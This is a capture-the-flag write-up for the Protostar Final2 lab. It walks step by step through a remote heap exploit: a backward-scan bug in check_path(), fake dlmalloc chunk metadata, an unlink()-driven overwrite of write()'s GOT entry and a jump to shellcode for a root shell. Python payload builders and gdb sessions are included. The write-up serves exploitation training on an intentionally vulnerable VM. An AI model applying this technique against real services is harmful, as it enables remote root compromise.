This is an explanation of Protostar level Final2. I wrote a solution in April without an explanation. I read it last night and had to spend half a day to understand it again. So next time I’ll write the explanation while it’s still fresh in my head.
The level’s description is
Remote heap level :)
Core files will be in /tmp.
This level is at /opt/protostar/bin/final2
This is the source code.
Overview of source code
The first line of the description, coupled with the fact that the code listens on port 2993, means we’ll have to send a TCP packet that exploits a heap-related vulnerability. main() is pretty simple. It runs the final2 binary in the background as root and processes requests with get_requests().
get_requests() declares an array of 256 char pointers and reads input strings into it. If any request isn’t exactly REQSZ (128) bytes, the function breaks out of the while(1) loop. Any request payload that doesn’t start with FSRD also breaks out of the loop. Otherwise check_path() is called on the request and dll is incremented. Once the loop exits, a for-loop writes “Process OK” to stdout and frees each string buffer, starting with the oldest.
check_path() stores a pointer to the right-most / in buf in p. l is the length of the string starting at p. If p is not NULL, start is set to point to the part of buf that has "ROOT". If "ROOT" is a substring of buf, the while loop decrements start until it points to a /. Then memmove() copies l bytes of the string starting at p to start.
A TCP packet with the string FSRD/ROOT/AAAA will cause p to point to the second /, so p as a string is /AAAA and l is 5. start initially points to the R in ROOT and is then decremented until it points to the first /. memmove() changes the string to FSRD/AAAA/AAAA.
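To make the walkthrough concrete, here is a small Python model of check_path() as described above. It is a sketch built from the description, not the level's C source: memory is a bytearray, pointers are offsets into it, and the function signature is my own choice.

```python
def check_path(mem: bytearray, buf: int) -> None:
    """Model of check_path(); buf is the offset of a NUL-terminated string in mem."""
    end = mem.index(0, buf)              # a C string ends at the first NUL byte
    p = mem.rfind(b"/", buf, end)        # right-most '/' in the string
    if p == -1:
        return
    l = end - p                          # strlen(p)
    start = mem.find(b"ROOT", buf, end)  # strstr(buf, "ROOT")
    if start == -1:
        return
    while mem[start] != ord("/"):        # no lower bound check, as in the C loop
        start -= 1
    mem[start:start + l] = mem[p:p + l]  # memmove(start, p, l)


mem = bytearray(b"FSRD/ROOT/AAAA\x00")
check_path(mem, 0)
print(mem[:-1].decode())  # FSRD/AAAA/AAAA
```

One difference from C: a negative offset in Python wraps around to the end of the bytearray instead of walking into lower memory, so this model only makes sense when a / exists somewhere to the left of ROOT.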
Notice that the start-- loop doesn’t check the bounds of the string passed in as buf. It will keep scanning leftward until it finds some /, even one that lies before the start of buf. So memmove() can write to memory outside of the current string.
General Exploit Strategy
We know we’ll need to exploit the free() call, which in this series of exercises uses the vulnerable dlmalloc unlink() macro. In a previous post, I showed how this exploit manipulates heap memory to redirect code execution. We’ll need to inject shellcode via the request payloads. Our request payloads also need to corrupt heap memory in a way that tricks dlmalloc into redirecting execution to the shellcode.
Exploiting memmove()
Let’s craft a first payload that will allow the second payload to overwrite heap memory before the start of the second string. FSRDAAAA...AAAA/AAAA should work. The second payload can be FSRDROOTAAA...AAAA/BBBB. Because the second string has no / before ROOT, the scan runs left past the start of the second string and stops at the / near the end of the first string. After the second call to check_path(), the heap memory of the first string should therefore be FSRDAAAA...AAAA/BBBB. Let’s confirm this with a Python script and gdb. We’ll set a breakpoint right after the call to check_path() and send these two strings.
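Before touching the VM, the expected result can be checked offline. The sketch below lays out two adjacent chunks in a bytearray and runs a Python model of check_path() on each request. The layout is an assumption for illustration: an 8-byte header of (0, 0x89) in front of each 128-byte request, with zero bytes after the second chunk.

```python
import struct

REQSZ = 128
HEAP_BASE = 0x804E000  # address of the first chunk in this write-up


def check_path(mem, buf):
    """Model of check_path(); buf is an offset into mem."""
    end = mem.index(0, buf)
    p = mem.rfind(b"/", buf, end)
    start = mem.find(b"ROOT", buf, end)
    if p == -1 or start == -1:
        return
    while mem[start] != ord("/"):            # may walk left out of the string
        start -= 1
    mem[start:start + end - p] = mem[p:end]  # memmove(start, p, strlen(p))


def chunk(payload):
    # Assumed layout: prev_size, then size | PREV_INUSE, then the request data
    return struct.pack("<II", 0, 0x89) + payload


first = b"FSRD" + b"A" * (REQSZ - 9) + b"/AAAA"
second = b"FSRDROOT" + b"A" * (REQSZ - 13) + b"/BBBB"
heap = bytearray(chunk(first) + chunk(second) + b"\x00" * 8)

check_path(heap, 0x08)  # first request: no ROOT, nothing moves
check_path(heap, 0x90)  # second request: the scan crosses into the first chunk

print(hex(HEAP_BASE + 0x84), bytes(heap[0x84:0x88]))  # 0x804e084 b'BBBB'
```

The scan passes over the second chunk's header on its way left, which works here because none of the header bytes is 0x2f.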
We save the following contents to a file named test.py.
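A script along these lines might look like the sketch below. It is written for Python 3, and the function names are hypothetical. The host is the VM address used later in this write-up, so yours will differ.

```python
import socket

HOST = "192.168.99.107"  # assumption: the VM's host-only address; change to yours
PORT = 2993
REQSZ = 128


def build_test_payloads():
    """Return the two 128-byte test requests described above."""
    first = b"FSRD" + b"A" * (REQSZ - 9) + b"/AAAA"
    second = b"FSRDROOT" + b"A" * (REQSZ - 13) + b"/BBBB"
    return first, second


def send_payloads(payloads, host=HOST, port=PORT):
    """Send each request over a single TCP connection."""
    with socket.create_connection((host, port)) as s:
        for payload in payloads:
            assert len(payload) == REQSZ  # shorter requests end the server loop
            s.sendall(payload)


# To run against the VM:
# send_payloads(build_test_payloads())
```

The send call is left commented out so the file can be imported and the payloads inspected without a running VM.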
I’m running the Protostar VM on VirtualBox on a MacBook. Set the network settings for the VM to Host-only Adapter. Once the VM starts, use the VirtualBox “Show” button to get a terminal to the VM. Log in with username user and password user. Run ip addr show to find the VM’s local IP address. Mine is 192.168.99.107. I then close the VirtualBox terminal because I like to use iTerm. I SSH with iTerm into the VM as root with password godmode. We need to be root in order to attach gdb to a running process.
You can see final2 is already running. We get the PID.
Now attach gdb to it. Since the program forks a new child process to handle requests, we use set follow-fork-mode child to make gdb follow the child process instead of the parent. set detach-on-fork off makes gdb hold control of both parent and child (I’m not sure if this is necessary). The other two gdb settings are my personal preferences.
Disassemble get_requests() to find where check_path() returns.
Now run our Python script in another terminal to send the strings.
Our gdb terminal will show the following.
Print buf to show the address it points to. Then examine the first 40 DWORDs in hexadecimal starting at address 0x804e000 (0x804e008 - 0x8, so we can see the first heap chunk’s metadata in the preceding 8 bytes). We can see FSRD (0x44525346), followed by lots of As (0x41s), ending in /AAAA.
We continue and examine the memory of the first chunk again. We expect the memory at address 0x804e084 to be BBBB, or 0x42424242, which it is.
Exploiting free()
With the ability to overwrite bytes following a strategically placed / character in the previous heap chunk, we can perform a classic heap overflow exploit using the unlink() technique. We can’t overwrite the first chunk’s heap metadata because there’s no way to insert a / before it. So we target the second chunk’s heap metadata. I’m now going to rehash some of the dlmalloc algorithm explained in my previous post because it can be a little confusing.
When the first chunk is freed, unlink() will run on the second chunk if the second chunk has already been freed. dlmalloc determines whether the second chunk is free by checking the third chunk’s PREV_INUSE bit, which is the lowest bit of the second DWORD (the size field) of the chunk. In order to find the start of the third chunk, dlmalloc takes the second chunk’s second DWORD, masks off the lowest bit (i.e. ANDs it with ~0x1), and adds the result to the second chunk’s starting address. So in the above memory dump, the start of the second chunk is (0x00000089 & ~0x1) + 0x804e000 = 0x804e088. Likewise, the start of the third chunk is (0x00000089 & ~0x1) + 0x804e088 = 0x804e110. So we have to figure out a way to write arbitrary bytes to the third chunk.
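The address arithmetic is easy to check in Python. This is a minimal sketch that follows the simplification used above and masks only the lowest bit; the real allocator may reserve more low bits of the size field for flags. The helper name next_chunk is mine.

```python
PREV_INUSE = 0x1


def next_chunk(addr: int, size_field: int) -> int:
    """Start of the following chunk: address plus size with the flag bit cleared."""
    return (addr + (size_field & ~PREV_INUSE)) & 0xFFFFFFFF


first = 0x804E000
second = next_chunk(first, 0x00000089)
third = next_chunk(second, 0x00000089)
print(hex(second), hex(third))  # 0x804e088 0x804e110
```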
But we’re already writing arbitrary bytes to the second chunk’s metadata. Is there a way to make dlmalloc think the third chunk starts somewhere in memory where we’re already writing bytes for the second chunk? Nothing in dlmalloc checks that the third chunk is actually right after the second. dlmalloc just blindly adds two numbers. One of these numbers is the second chunk’s size, which we can set via the memmove() bug. Let’s make dlmalloc think the third chunk is actually four bytes before the start of the second chunk. The second chunk is at 0x804e088, so the “virtual” third chunk will be at 0x804e084. What number added to 0x804e088 equals 0x804e084? -4. Integer overflow means that in 32-bit arithmetic adding 0xfffffffc is the same as adding -4 (0x804e088 + 0xfffffffc = 0x804e084). So the second chunk’s second DWORD, representing its size, must be 0xfffffffc, and the PREV_INUSE bit of the virtual third chunk must be 0. The virtual third chunk’s size field is its second DWORD at 0x804e088, which is also the second chunk’s first DWORD. So writing 0xfffffffc 0xfffffffc over the second chunk’s first two DWORDs will work.
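Here is the same trick as a small Python sketch. Memory is modelled as a dict from address to DWORD, which is my own simplification, and only the two fake DWORDs are filled in.

```python
MASK32 = 0xFFFFFFFF
PREV_INUSE = 0x1


def next_chunk(addr, size_field):
    # 32-bit wraparound: adding 0xfffffffc behaves like adding -4
    return (addr + (size_field & ~PREV_INUSE)) & MASK32


# Fake metadata written over the second chunk's first two DWORDs
memory = {
    0x804E088: 0xFFFFFFFC,  # second chunk's first DWORD = virtual third chunk's size
    0x804E08C: 0xFFFFFFFC,  # second chunk's size
}

second = 0x804E088
third = next_chunk(second, memory[second + 4])
third_size = memory[third + 4]
second_looks_free = (third_size & PREV_INUSE) == 0
print(hex(third), second_looks_free)  # 0x804e084 True
```

The lowest bit of 0xfffffffc is 0, so the same value serves both as the wrapped size and as a size field with PREV_INUSE cleared.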
Once we fool dlmalloc into thinking the second chunk is already freed, dlmalloc will unlink() it. So we need to craft values for the second chunk’s forwards and backwards pointers such that unlink() will redirect code execution to another region of memory where we can insert shellcode.
In the Heap3 level we overwrote a function’s entry in the global offset table (GOT), which the function’s procedure linkage table (PLT) stub jumps through, with the address of shellcode. We can do the same here. Since we send two packets, dll will be 2. The for-loop will call write() twice. The first free() will overwrite write()’s address in the GOT, so the second call to write() will run our shellcode. Let’s find the GOT entry containing the address of write(). We disassemble get_requests and examine the address 0x8048dfc as an instruction to get the address in the GOT that points to the actual write() function in the dynamically linked library. We want to overwrite the contents of 0x804d41c with the address of our shellcode. Since unlink() writes the backwards pointer to the address 12 bytes past the forwards pointer, we need to make the forward pointer 0x804d41c - 12.
Crafting Malicious Packets
Where should we put our shellcode? We can include it in our first request. The first two DWORDs of the first chunk’s data will be clobbered by dlmalloc when it sets the first chunk’s forwards and backwards pointers. The first DWORD needs to be used for FSRD anyway. So let’s put shellcode at 0x804e010. This address will be our backwards pointer.
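With both pointers chosen, the effect of unlink() can be modelled in a few lines of Python. This is a sketch of the two pointer writes only, with memory as a dict from address to DWORD. The offsets 8 and 12 are the forwards and backwards pointer positions within a chunk, as used above.

```python
WRITE_GOT = 0x804D41C     # GOT entry for write()
SHELLCODE = 0x804E010     # where the shellcode will live
SECOND_CHUNK = 0x804E088


def unlink(mem, chunk):
    """Model of the two writes performed when a chunk is unlinked."""
    fd = mem[chunk + 8]    # forwards pointer
    bk = mem[chunk + 12]   # backwards pointer
    mem[fd + 12] = bk      # FD->bk = BK
    mem[bk + 8] = fd       # BK->fd = FD


mem = {
    SECOND_CHUNK + 8: WRITE_GOT - 12,
    SECOND_CHUNK + 12: SHELLCODE,
}
unlink(mem, SECOND_CHUNK)
print(hex(mem[WRITE_GOT]))                           # 0x804e010
print(hex(SHELLCODE + 8), hex(mem[SHELLCODE + 8]))   # 0x804e018 0x804d410
```

The first write is the one we want. The second write is a side effect: it puts the forwards pointer value eight bytes past the backwards pointer, at 0x804e018.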
To summarize, this is how the packets should look so far.
The first payload must start with FSRD. Then we need four filler bytes, AAAA, followed by the shellcode (TBD). The last byte must be / for memmove(). The payload must be 128 bytes. The spaces in the payload visualization below are just for readability. They shouldn’t be in the actual payload.
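The second payload must start with FSRDROOT. The fake metadata must directly follow a /, because memmove() copies from the right-most / in the second payload onto the / at the end of the first. So after that / we have 0xfffffffc 0xfffffffc, then the forward pointer 0x804d41c - 12 and the backward pointer 0x804e010. The whole payload must again be 128 bytes. We can just fill the rest with As.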
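The two payloads can be assembled with struct.pack. This is a sketch under a few assumptions of mine: the function name, A as the filler byte in both payloads, and the / placed right after FSRDROOT. The shellcode is passed in as a parameter so a placeholder can be used while testing.

```python
import struct

REQSZ = 128
WRITE_GOT = 0x804D41C
SHELLCODE_ADDR = 0x804E010


def build_payloads(shellcode: bytes):
    """Return (first, second) requests, each exactly REQSZ bytes."""
    body = b"FSRD" + b"AAAA" + shellcode
    first = body + b"A" * (REQSZ - len(body) - 1) + b"/"  # last byte must be '/'

    fake = struct.pack(
        "<IIII",
        0xFFFFFFFC,        # virtual third chunk's size (PREV_INUSE clear)
        0xFFFFFFFC,        # second chunk's size (acts as -4)
        WRITE_GOT - 12,    # forwards pointer
        SHELLCODE_ADDR,    # backwards pointer
    )
    second = b"FSRDROOT" + b"/" + fake
    second += b"A" * (REQSZ - len(second))
    return first, second


first, second = build_payloads(b"\xcc" * 4)
print(len(first), len(second))  # 128 128
```

None of the fake metadata bytes is 0x2f or 0x00, so the / before them stays the right-most / in the second string and the copy doesn’t stop early.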
Before we craft shellcode, let’s confirm the exploit will redirect code execution to the proposed shellcode address. Instead of using actual shellcode, we’ll use four bytes of 0xcc, which is the one-byte x86 instruction INT3. It raises a breakpoint trap that stops the process and hands control to any attached debugger. If we hit this opcode, our attached gdb debugger will receive the SIGTRAP signal.
Let’s test with the below Python script.
Attach gdb to the final2 process again.
Set a breakpoint at the call to write().
Run the Python script in another terminal. Hit enter to send a third packet that’s less than 128 bytes to break out of the while(1) loop.
The gdb session should hit the breakpoint at write().
Examine the first 80 DWORDs. Continue and examine again.
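The memory at 0x804e008 and 0x804e00c has been changed to addresses before the heap. These are the forwards and backwards pointers dlmalloc set when it freed the first chunk (I guess they point before the heap because that’s where dlmalloc keeps some special value for its free lists). Our INT3 instruction is at 0x804e010. Let’s look at the GOT entry for write().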
Its value is the location of our INT3. This means the next call to write() will redirect code execution to our INT3, which should cause gdb to break again.
It worked!
Crafting the Shellcode
So now all we have to do is insert some real shellcode that’ll own the system. Since final2 is running as root, let’s make the process start a shell. This will allow us to send arbitrary commands over TCP that get executed as root, i.e. remote code execution. Shellstorm has a great library of shellcodes. Let’s use “Linux/x86 - execve(/bin/sh) - 28 bytes”. But we have a problem. unlink() overwrites the memory at 0x804e018 (it’ll always overwrite four bytes of memory eight bytes past whatever address we pick as the backwards pointer), and no useful shellcode is short enough to fit into eight bytes. What can we do?
If only the shellcode could jump past 0x804e018 to 0x804e01c, where we have a huge piece of contiguous memory. Luckily the short jmp instruction (\xeb) does exactly this. Its one-byte argument is how many bytes to jump over, counted from the end of the two-byte jmp instruction. So our shellcode can start with 0xeb 0x0a, which moves the instruction pointer 10 bytes forward, from 0x804e012 to 0x804e01c. We fill in the 10 bytes in between with nops (0x90). Our final script will be this.
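The jump arithmetic can be double-checked with a short Python sketch. It only builds the 12-byte prefix that goes in front of the real shellcode. The name trampoline is mine, and the shellcode bytes themselves are deliberately left out.

```python
SHELLCODE_ADDR = 0x804E010
CLOBBERED = range(0x804E018, 0x804E01C)  # the four bytes unlink() overwrites

JMP_SHORT = b"\xeb\x0a"                  # jmp short, displacement 0x0a
trampoline = JMP_SHORT + b"\x90" * 10    # the nops are skipped, so clobbering them is harmless

# The displacement is relative to the address right after the jmp instruction
landing = SHELLCODE_ADDR + len(JMP_SHORT) + JMP_SHORT[1]
print(hex(landing))  # 0x804e01c

# The real shellcode would be appended here: trampoline + shellcode
```

The landing address is exactly SHELLCODE_ADDR plus the length of the prefix, so whatever follows the prefix in the first payload is what runs after the jump.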